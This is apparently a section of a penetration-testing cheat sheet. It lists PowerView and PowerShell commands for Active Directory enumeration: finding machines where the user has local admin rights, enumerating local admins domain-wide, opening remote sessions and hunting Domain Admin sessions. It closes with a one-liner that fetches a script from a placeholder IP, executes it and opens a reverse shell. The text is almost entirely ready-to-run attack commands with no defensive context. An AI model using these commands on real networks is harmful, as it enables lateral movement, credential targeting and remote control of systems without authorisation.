9️⃣ Miscellaneous Enumeration
PowerView: find all machines on the current domain where the current user has local admin access

Find-LocalAdminAccess -Verbose
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

PowerView: find local admins on all machines of the domain (needs admin privs)

Invoke-EnumerateLocalAdmin -Verbose

Connect to a machine with administrator privs

Enter-PSSession -Computername <computername>

Save and reuse a session to a machine

$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Find active sessions

Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"

Find active sessions of domain admins

Invoke-UserHunter -Groupname "Domain Admins"

Check access to the machines found

Invoke-UserHunter -CheckAccess

PowerShell reverse shell

Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IP